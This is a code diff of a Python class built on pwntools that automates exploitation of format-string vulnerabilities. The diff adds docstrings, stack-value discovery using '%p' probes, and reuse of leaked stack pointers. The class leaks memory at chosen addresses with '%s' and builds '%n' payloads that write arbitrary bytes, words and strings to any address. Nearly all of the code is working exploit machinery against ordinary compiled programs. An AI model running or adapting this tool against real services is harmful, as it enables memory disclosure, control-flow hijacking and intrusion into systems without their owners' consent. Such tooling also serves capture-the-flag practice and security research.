@@ -1,14 +1,52 @@
 from pwn import *
 
 class FormatString:
+    """Initialize a FormatString class
+    
+    Parameters
+    ----------
+    exec_fmt : function
+        Function that takes in one input, a string, and returns the output of the format string vulnerability on it.
+    arch : str, optional
+        String representing what architecture this binary is.
+    bits : int, optional
+        How many bits is this binary? Commonly 32 (Default) or 64.
+    endian : str, optional
+        Is this binary little or big endian?
+    elf : pwnlib.elf.elf.ELF, optional
+        pwnlib elf instantiation of this binary. If specified, all fields will be taken from this class.
+    maxExplore : int, optional
+        How deep down the stack should we explore? Larger numbers may take more time. Default is 64.
+    badChars : str, optional
+        What characters should we avoid when exploiting this? Defaults to newline character.
+    
+    
+    Returns 
+    -------
+    fmtStr : FormatString.FormatString
+
+    
+    Attributes
+    ----------
+    arch : str
+        String representation of the architecture, such as i386 and amd64
+    bits : int
+        Integer representation of how many bits are in this architecture
+    endian : str
+        String representation of what endianness this binary is: little or big
+    elf : pwnlib.elf.elf.ELF
+        pwnlib ELF instantiation representing this binary
+    exec_fmt : function
+        Function to be called when we need to evaluate a format string
+    maxExplore : int
+        How deep down the stack should we explore?
+    badChars : str
+        What characters should we avoid when exploiting this?
+
+    """
     
     def __init__(self,exec_fmt,arch='i386',bits=32,endian='little',elf=None,maxExplore=64,badChars="\n"):
-        """
-        elf == pwnlib elf
-        exec_fmt == function that takes in a string and returns the exact format string output from it
-        badChars == string containing all the bad characters for this format string. For example, newline is often a bad char in format string attacks.
-        """
-        
+
         if type(exec_fmt) is not type(lambda x: x):
             log.error("exec_fmt arg must be a callable function.")
             return
@@ -27,6 +65,9 @@ class FormatString:
         # Where is our controlled buffer?
         self.pad = None
         self.index = None
+
+        # Recording what's already on the stack
+        self.stack = [0]
         
         # The ELF will override the other options
         if elf is not None:
@@ -41,11 +82,76 @@ class FormatString:
         self.leak = memleak.MemLeak(self._leak)
         
         # Try to determine where we are in the binary
-        self.explore()
+        self._findIndex()
 
-    def explore(self):
-        """
-        Figure out where our input starts as well as other information automatically.
+        # explore the stack
+        self._exploreStack()
+
+    def printStack(self):
+        """Print out what we know of the stack layout in a table format."""
+        columns = ["Index","Value","Guess"]
+        table = PrettyTable(columns)
+        
+        # Loop through stack items creating table
+        for i in range(1,len(self.stack)):
+            guess = ""
+
+            # See if it's printable
+            asString = hex(self.stack[i])[2:]
+            if len(asString) % 2 != 0:
+                asString = "0" + asString
+            asString = unhexlify(asString)
+
+            if min(asString, lambda x: x in string.printable) == True:
+                guess = asString
+            
+            # If we have elf tools and this appears to be a known address
+            if self.elf:
+                symbols = [sym for sym in self.elf.symbols if self.elf.symbols[sym] == self.stack[i]]
+                if len(symbols) > 0:
+                    guess = "Symbol: " + symbols[0]
+
+                # If this is part of our binary, let's try dereferencing it
+                #if self.elf.vaddr_to_offset(self.elf.symbols[sym])
+            
+            table.add_row([
+                i,
+                hex(self.stack[i]),
+                guess
+            ])
+
+        print(table)
+            
+
+    def _exploreStack(self):
+        """Explore what pointers and data already exists on the stack."""
+
+        wordSize = self.bits / 8
+        
+        # Assuming 0 pad if we haven't found one yet...
+        # TODO: Could create a heuristic find to get a better idea of the correct pad.
+        pad = self.pad or 0
+
+        # Loop through and record the values
+        for i in range(1,self.maxExplore):
+            s = "{2}{0}%{1}$p{0}".format("J"*wordSize,i,"C"*pad)
+            out = self.exec_fmt(s)
+            out = out[out.index("J"*wordSize)+wordSize:]
+            out = out[:out.index("J"*wordSize)]
+            if out == "" or "(nil)" in out:
+                self.stack.append(0)
+            else:
+                self.stack.append(int(out,16))
+
+        
+
+    def _findIndex(self):
+        """Figure out where our input starts as well as other information automatically.
+        
+        The findIndex step automates the process of determining where our
+        controlled input starts. It will iteratively shift inputs to the format
+        string function until it finds the proper index and padding. It will
+        then save that value in the class instance for future reference.
         """
         print("Exploring format string vulnerability...")
 
@@ -93,44 +199,74 @@ class FormatString:
             log.warn("Failed to find offset to our input! You will have reduced functionality.")
 
     def _leak(self,addr):
-        """
-        Given an addr, leak that memory.
+        """Given an addr, leak that memory as raw string.
+
+        .. note::
+
+            This is a base function. You probably don't want to call this directly. Instead, you should call methods of the ``leak`` method, such as ``leak.d(addr)``
+
+        Parameters
+        ----------
+        addr : int
+            Address to leak some bytes from
+
+        Returns
+        -------
+        str
+            Raw leak of bytes as a string starting from the given address.
+
+
         """
         wordSize = self.bits / 8
 
-        # Hand doing this for now due to not necessarily using pwntools...
-        if self.bits == 32:
-            if self.endian == 'little':
-                addr = pack("<I",addr)
-            else:
-                addr = pack(">I",addr)
-        elif self.bits == 64:
-            if self.endian == 'little':
-                addr = pack("<Q",addr)
-            else:
-                addr = pack(">Q",addr)
-        else:
-            log.error("Unable to leak address due to unknown bits size of {0}".format(self.bits))
-            return None
-
-        # Check for chars we don't like
-        if self._hasBadChar(addr):
-            return None
-        
-        # TODO: To simplify things, I give us generically 3 characters (upto index 999) to work with. This might not be desired in some cases. Maybe re-write this later to be more efficient
-
-        # Real index takes into account that our own input is moving this around
-        sLineSize = int(wordSize * round(float(6)/wordSize)) / wordSize
-        realIndex = self.index + 2 + sLineSize
-        sLine = "%{0}$s".format(str(realIndex).rjust(3,"0"))
-        sLine = sLine + "J" * (wordSize - (len(sLine) % wordSize)) if (len(sLine) % wordSize) != 0 else sLine # Pad it out to a word length
-        
         # TODO: Randomize guard?
         guard = "J"*wordSize
 
-        # Put it together
-        fmt = "{0}{1}{2}{4}{3}".format(self.padChar*self.pad,guard,sLine,addr,guard)
-        #log.debug("Sending format string: {0}".format(fmt))
+        # If we control an index, let's use it
+        if self.index:
+
+            # Hand doing this for now due to not necessarily using pwntools...
+            if self.bits == 32:
+                if self.endian == 'little':
+                    addr = pack("<I",addr)
+                else:
+                    addr = pack(">I",addr)
+            elif self.bits == 64:
+                if self.endian == 'little':
+                    addr = pack("<Q",addr)
+                else:
+                    addr = pack(">Q",addr)
+            else:
+                log.error("Unable to leak address due to unknown bits size of {0}".format(self.bits))
+                return None
+
+            # Check for chars we don't like
+            if self._hasBadChar(addr):
+                return None
+        
+            # TODO: To simplify things, I give us generically 3 characters (upto index 999) to work with. This might not be desired in some cases. Maybe re-write this later to be more efficient
+
+            # Real index takes into account that our own input is moving this around
+            sLineSize = int(wordSize * round(float(6)/wordSize)) / wordSize
+            realIndex = self.index + 2 + sLineSize
+            sLine = "%{0}$s".format(str(realIndex).rjust(3,"0"))
+            sLine = sLine + "J" * (wordSize - (len(sLine) % wordSize)) if (len(sLine) % wordSize) != 0 else sLine # Pad it out to a word length
+        
+
+            # Put it together
+            fmt = "{0}{1}{2}{4}{3}".format(self.padChar*self.pad,guard,sLine,addr,guard)
+
+        # See if we have this address in the stack
+        elif addr in self.stack:
+            pad = self.pad or 0
+            # Don't really have to worry about padding here
+            sLine = "%{0}$s".format(self.stack.index(addr))
+            fmt = "{0}{1}{2}{1}".format(self.padChar*pad,guard,sLine)
+
+        # We failed.
+        else:
+            return None
+
         out = self.exec_fmt(fmt)
 
         # If the leaker failed to return anything, we won't be able to do any more
@@ -148,6 +284,25 @@ class FormatString:
         return out
 
     def _hasBadChar(self,s):
+        """Check input for bad characters.
+
+        Given the badChars we initialized the class with, check the input variable to see if any exist in there.
+
+        Parameters
+        ----------
+        s : int or str
+            Input to be checked for bad characters.
+
+        
+        Returns
+        -------
+        bool
+            True if input has bad characters, False otherwise
+
+
+        Note that if the input is an integer, it will be converted to hex then to a string to be checked for bad characters.
+        """
+
         # Just convert it
         if type(s) is int:
             h = hex(s)[2:]
@@ -165,7 +320,20 @@ class FormatString:
         return False
 
     def _packPointer(self,val):
-        """Packs val as pointer relevant to the current binary"""
+        """Packs val as pointer relevant to the current binary.
+
+        Parameters
+        ----------
+        val : int
+            Pointer value as integer that should be packed appropriately to this binary.
+
+        
+        Returns
+        -------
+        str
+            Integer packed as string relevant to this binary (i.e.: proper endianness)
+
+        """
         assert type(self.bits) is int
         assert type(self.endian) is str
 
@@ -189,7 +357,23 @@ class FormatString:
 
 
     def write_byte(self,addr,val):
-        """Write only a single byte to the address specified"""
+        """write a single byte of data at addr
+
+        Parameters
+        ----------
+        addr : int
+            Address to write the byte to
+        val : int or str
+            Integer or string to write to address
+
+
+
+        This call will attempt to write the value provided into the address
+        provided. If value is a string, it will convert it to an integer first.
+
+        """
+
+        # TODO: Update this to utilize exisiting stack pointers like how i did it to writing dwords
         
         assert type(val) in [int,str]
         assert type(addr) is int
@@ -252,7 +436,21 @@ class FormatString:
 
 
     def write_word(self,addr,val):
-        """write a words worth of data. val can be int or string"""
+        """write a word of data at addr
+
+        Parameters
+        ----------
+        addr : int
+            Address to write the word to
+        val : int or str
+            Integer or string to write to address
+
+
+
+        This call will attempt to write the value provided into the address
+        provided. If value is a string, it will convert it to an integer first.
+
+        """
 
         assert type(val) in [int,str]
         assert type(addr) is int
@@ -274,7 +472,24 @@ class FormatString:
 
         
     def write_n_words(self,addr,val,n):
-        """Write value at addr, telling FormatString how many words you actually want to write"""
+        """Write value at addr, telling FormatString how many words you actually want to write
+
+        Parameters
+        ----------
+        addr : int
+            Address to write words to
+        val : int
+            Value to write at address
+        n : int
+            Number of words that this value represents
+
+
+        This will attempt to write `n` words of `val` starting at address
+        `addr`. Note that it will write in words and, for now, will not utilize
+        byte writes. This is the core method that the other calls (aside from
+        write_byte) use to actually write.
+
+        """
 
         assert type(val) in [int,long]
         assert type(addr) in [int,long]
@@ -288,6 +503,12 @@ class FormatString:
 
         pointer_len = self.bits/8
 
+        # TODO: Assuming pad of 0. Need to implement heuristic to guess a better pad.
+        pad = self.pad or 0
+
+        # TODO: This is kinda #YOLO... Need to better handle the case where we're going into the blind from the get go..
+        index = self.index or 1
+
         # Split up the val into multiple word writes
         writes = []
 
@@ -309,7 +530,7 @@ class FormatString:
         writes = sorted(writes,key=lambda x: x['val'])
 
         # Add any initial pad
-        fmt = "J"*self.pad
+        fmt = "J"*pad
 
         # For each value we need to write, add it on to the format string
         cumulative = 0
@@ -335,16 +556,22 @@ class FormatString:
         fmt += "J"*pad_after
 
         # Update our addr index
-        index_updated = self.index + (size / pointer_len)
+        index_updated = index + (size / pointer_len)
 
         # Going to dynamically build the pythong format args
         fmt_format = []
 
         # Tack on the addresses now
         for write in writes:
-            fmt += self._packPointer(write['addr'])
-            fmt_format.append(str(index_updated).rjust(3,"0"))
-            index_updated += 1
+            # If we can reference it already on the stack, use that to save space.
+            if write['addr'] in self.stack:
+                fmt_format.append(str(self.stack.index(write['addr'])).rjust(3,"0"))
+
+            # Looks like we need to use our own buffer for the pointer
+            else:
+                fmt += self._packPointer(write['addr'])
+                fmt_format.append(str(index_updated).rjust(3,"0"))
+                index_updated += 1
 
         # Now add in our indexes
         fmt = fmt.format(*fmt_format)
@@ -353,6 +580,21 @@ class FormatString:
         
 
     def write_dword(self,addr,val):
+        """write a double word of data at addr
+
+        Parameters
+        ----------
+        addr : int
+            Address to write the double word to
+        val : int or str
+            Integer or string to write to address
+
+
+
+        This call will attempt to write the value provided into the address
+        provided. If value is a string, it will convert it to an integer first.
+
+        """
 
         assert type(val) in [int,str]
         assert type(addr) is int
@@ -373,6 +615,21 @@ class FormatString:
         return self.write_n_words(addr,val,2)
     
     def write_qword(self,addr,val):
+        """write a quad word of data at addr
+
+        Parameters
+        ----------
+        addr : int
+            Address to write the quad word to
+        val : int or str
+            Integer or string to write to address
+
+
+
+        This call will attempt to write the value provided into the address
+        provided. If value is a string, it will convert it to an integer first.
+
+        """
 
         assert type(val) in [int,str,long]
         assert type(addr) is int
@@ -393,7 +650,22 @@ class FormatString:
         return self.write_n_words(addr,val,4)
 
     def write_string(self,addr,s):
-        """Attempt to write s as a string at address addr"""
+        """Attempt to write s as a string at address addr
+
+        Parameters
+        ----------
+        addr : int
+            Address to start writing the string to
+        s : str
+            String to write to address
+
+
+
+        This call will attempt to write the string provided into the address
+        provided. It does this by turning the string into a large number and
+        writing the large number.
+
+        """
         
         assert type(addr) in [int, long]
         assert type(s) is str
@@ -410,18 +682,23 @@ class FormatString:
         self.write_n_words(addr,int(s.encode('hex'),16),words)
 
     def write_b(self,addr,val):
+        """Wraps the ``write_byte`` call"""
         return self.write_byte(addr,val)
         
     def write_w(self,addr,val):
+        """Wraps the ``write_word`` call"""
         return self.write_word(addr,val)
 
     def write_d(self,addr,val):
+        """Wraps the ``write_dword`` call"""
         return self.write_dword(addr,val)
 
     def write_q(self,addr,val):
+        """Wraps the ``write_qword`` call"""
         return self.write_qword(addr,val)
 
     def write_s(self,addr,s):
+        """WRaps the ``write_string`` call"""
         return self.write_string(addr,s)
 
     def __getitem__(self,addr):
@@ -435,3 +712,5 @@ import logging
 log = logging.getLogger('FormatString')
 from binascii import unhexlify
 from struct import pack, unpack
+from prettytable import PrettyTable
+import string
